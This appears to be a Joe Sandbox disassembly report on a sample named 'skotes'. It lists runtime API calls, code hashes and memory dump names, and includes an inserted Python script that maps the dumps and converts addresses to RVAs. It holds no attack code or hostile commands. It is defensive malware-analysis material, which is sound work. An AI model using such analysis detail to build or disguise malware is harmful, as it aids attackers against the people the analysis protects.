                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                          • String ID: pEvents
                                                                                                                                                                                                                                          • API String ID: 2141394445-2498624650
                                                                                                                                                                                                                                          • Opcode ID: 093f23068ac175d760aab8dd7b7f38010bd29353b2e3ddc016f90ff394ecca27
                                                                                                                                                                                                                                          • Instruction ID: b3b5dd017e921a05234ef27dd6aceedf1d3efb41b7bbc60a9300fdad882dabdf
• Opcode Fuzzy Hash: 093f23068ac175d760aab8dd7b7f38010bd29353b2e3ddc016f90ff394ecca27
• Instruction Fuzzy Hash: 1F816B31D002199BCF24EBE8C981BEEB7B6AF56310F144469E401A7382DB75AE45CF92
APIs
• Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 006C26E3
  • Part of subcall function 006C24E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 006C2504
• Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 006C2704
• Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 006C2711
• Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 006C275F
• Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 006C27E6
• Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 006C27F9
• Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 006C2846
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
• String ID:
• API String ID: 2530155754-0
• Opcode ID: 709319297635fc71c4f4c50e0291c37c8ba638ed6c68c9b5f6f7c353e6610d3c
• Instruction ID: 3bfeb68bfc417fac905e1e0abc0746ab86862e5b56f314f03ed4d944cd0b760b
• Opcode Fuzzy Hash: 709319297635fc71c4f4c50e0291c37c8ba638ed6c68c9b5f6f7c353e6610d3c
• Instruction Fuzzy Hash: F481587490024AABDF169F54C9A1FFE7BA3EF46304F04409CEC416A352C7768D5ADBA1
APIs
• Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 006C2982
  • Part of subcall function 006C24E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 006C2504
• Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 006C29A3
• Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 006C29B0
• Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 006C29FE
• Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 006C2AA6
• Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 006C2AD8
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
• String ID:
• API String ID: 1256429809-0
• Opcode ID: 1c9f202c38913b24eab6bfe4ffb6719de703e8921c931903e8a948a34a105b6c
• Instruction ID: 642c96c07ef191fd169900ba1988ac07de37ba3ab6aaac1a179c974428f1d9c9
• Opcode Fuzzy Hash: 1c9f202c38913b24eab6bfe4ffb6719de703e8921c931903e8a948a34a105b6c
• Instruction Fuzzy Hash: E471657090024AABDF159FA8C8A1FFEBBA6EF45308F04409DEC416B352C7329D16DB61
APIs
• Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 006B2876
• Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 006B28DF
• Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 006B2913
  • Part of subcall function 006B07ED: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 006B080D
• Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 006B2993
• Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 006B29DB
  • Part of subcall function 006B07C2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 006B07DE
• Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 006B29EF
• Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 006B2A00
• Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 006B2A4D
• Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 006B2A7E
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::Manager::Resource$Affinity$Apply$Restrictions$InformationTopology$Restriction::$CleanupFindGroupLimits
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1321587334-0
                                                                                                                                                                                                                                          • Opcode ID: 5a414f686fc7f2136137480d1f045eb29bffb42c91410cf9164300de45ad97f3
                                                                                                                                                                                                                                          • Instruction ID: 564ca3db93ea9cdc39d6a45476c3664ce70660f2a2695ad2122f70823c6d0bd0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a414f686fc7f2136137480d1f045eb29bffb42c91410cf9164300de45ad97f3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13817AB1A006179BCB28DFA9D8A15FEBBF3BB48310B24502DD546A7351DB30ADC5CB94
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 006B6A1F
                                                                                                                                                                                                                                          • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 006B6A51
                                                                                                                                                                                                                                          • List.LIBCONCRT ref: 006B6A8C
                                                                                                                                                                                                                                          • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 006B6A9D
                                                                                                                                                                                                                                          • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 006B6AB9
                                                                                                                                                                                                                                          • List.LIBCONCRT ref: 006B6AF4
                                                                                                                                                                                                                                          • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 006B6B05
                                                                                                                                                                                                                                          • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 006B6B20
                                                                                                                                                                                                                                          • List.LIBCONCRT ref: 006B6B5B
                                                                                                                                                                                                                                          • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 006B6B68
                                                                                                                                                                                                                                            • Part of subcall function 006B5EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 006B5EF7
                                                                                                                                                                                                                                            • Part of subcall function 006B5EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 006B5F09
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3403738998-0
                                                                                                                                                                                                                                          • Opcode ID: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                                                                                                                                                          • Instruction ID: 1fc016a2819bd8f688a58af72c3331336eaa7cee2b591e75d140c19f9c3e1d64
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9512CB1A00219ABDF08DF64C595BEDB3B9BF08304F154069E915AB382DB74EE85CB90
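The function entries above identify their code by a memory dump name (Source File), a list of sibling dumps (Associated), a module Offset, and API references given as virtual addresses (ref: 006B6A1F). The following Python is an added worked example, not part of the Joe Sandbox report, that turns those fields into something a practitioner can use: it parses the dotted .sdmp name into process, step, base address and a protection field, builds an address-sorted map of the associated dumps, lists the regions that are executable and writable, and converts the quoted API addresses into RVAs relative to the module Offset so they can be located in the dumped PE. The dump list embedded below is a subset of the names in the entry above. Treating the fifth dotted field as a Win32 PAGE_* protection constant is an assumption the report does not state; everything else follows directly from the fields shown.

```python
import re
from dataclasses import dataclass
from typing import Iterable

# Constructed input: the "Source File" line and a subset of the "Associated"
# dump names exactly as they appear in the function entry above.
SOURCE_LINE = ("00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, "
               "Offset: 00690000, based on PE: true")
ASSOCIATED = [
    "00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp",
    "00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp",
    "00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp",
    "00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp",
    "00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp",
    "00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp",
    "00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp",
    "00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmp",
    "00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmp",
]
# Two of the "ref:" addresses quoted in the APIs list of the same entry.
API_REFS = {"_ReaderWriterLock::_AcquireWrite": 0x006B6A1F,
            "SchedulingNode::GetNextVirtualProcessor": 0x006B6B68}

# Assumption (not stated in the report): the fifth dotted field is a Win32
# PAGE_* protection constant. Only these three values occur in the list.
PROTECT = {0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}

# <process>.<step>.<numeric id>.<16-hex base>.<8-hex protection>.<3 more 8-hex fields>.sdmp
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<step>[0-9A-Fa-f]{8})\.(?P<uid>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})"
    r"(?:\.[0-9A-Fa-f]{8}){3}\.sdmp$")


@dataclass(frozen=True, order=True)
class Dump:
    base: int   # first field so that sorting orders dumps by address
    proc: int
    step: int
    prot: int
    name: str


def parse_sdmp(name: str) -> Dump:
    """Split one .sdmp file name into its numeric fields."""
    m = SDMP_RE.match(name.strip())
    if m is None:
        raise ValueError(f"unrecognised dump name: {name!r}")
    return Dump(base=int(m["base"], 16), proc=int(m["proc"], 16),
                step=int(m["step"], 16), prot=int(m["prot"], 16), name=name.strip())


def parse_source_line(line: str) -> tuple[Dump, int, bool]:
    """Return (dump, module offset, based-on-PE flag) from a 'Source File:' line."""
    name, _, rest = line.partition(",")
    off = re.search(r"Offset:\s*([0-9A-Fa-f]+)", rest)
    pe = re.search(r"based on PE:\s*(true|false)", rest, re.I)
    if off is None or pe is None:
        raise ValueError("missing Offset / based on PE fields")
    return parse_sdmp(name), int(off.group(1), 16), pe.group(1).lower() == "true"


def memory_map(names: Iterable[str]) -> list[Dump]:
    """All dumps sorted by base address; refuses a list that mixes processes."""
    dumps = sorted(parse_sdmp(n) for n in names)
    procs = {d.proc for d in dumps}
    if len(procs) > 1:
        raise ValueError(f"dump list mixes processes: {sorted(procs)}")
    return dumps


def executable_writable(dumps: Iterable[Dump]) -> list[Dump]:
    """Regions whose (assumed) protection is PAGE_EXECUTE_READWRITE."""
    return [d for d in dumps if d.prot == 0x40]


def rva(addr: int, module_base: int) -> int:
    """Convert a VA quoted in the report (ref: ...) to an RVA in the dumped module."""
    if addr < module_base:
        raise ValueError(f"{addr:#x} lies below module base {module_base:#x}")
    return addr - module_base


if __name__ == "__main__":
    src, module_base, based_on_pe = parse_source_line(SOURCE_LINE)
    print(f"module base {module_base:#010x}, based on PE: {based_on_pe}")
    for d in memory_map(ASSOCIATED):
        print(f"  {d.base:#010x}  {PROTECT.get(d.prot, f'{d.prot:#x}')}")
    for api, va in API_REFS.items():
        print(f"{api}: VA {va:#010x} -> RVA {rva(va, module_base):#x}")
```

The RVA is what you need when opening the dumped module in a disassembler or diffing it against the original on-disk file, because the report's ref addresses are virtual addresses in the sandboxed process. The process-mixing check matters when the same script is run over several function entries: dump lists from different process IDs must never be merged into one map.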
APIs
• IsInExceptionSpec.LIBVCRUNTIME ref: 006C53A0
• type_info::operator==.LIBVCRUNTIME ref: 006C53C7
• ___TypeMatch.LIBVCRUNTIME ref: 006C54D3
• IsInExceptionSpec.LIBVCRUNTIME ref: 006C55AE
• CallUnexpected.LIBVCRUNTIME ref: 006C5650
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: ExceptionSpec$CallMatchTypeUnexpectedtype_info::operator==
• String ID: csm$csm$csm
• API String ID: 4162181273-393685449
• Opcode ID: 93f05e7ad1d219d688c66ea9ff4ae7339e0592e4dd16ec30e9dc2cba2f5a1fc7
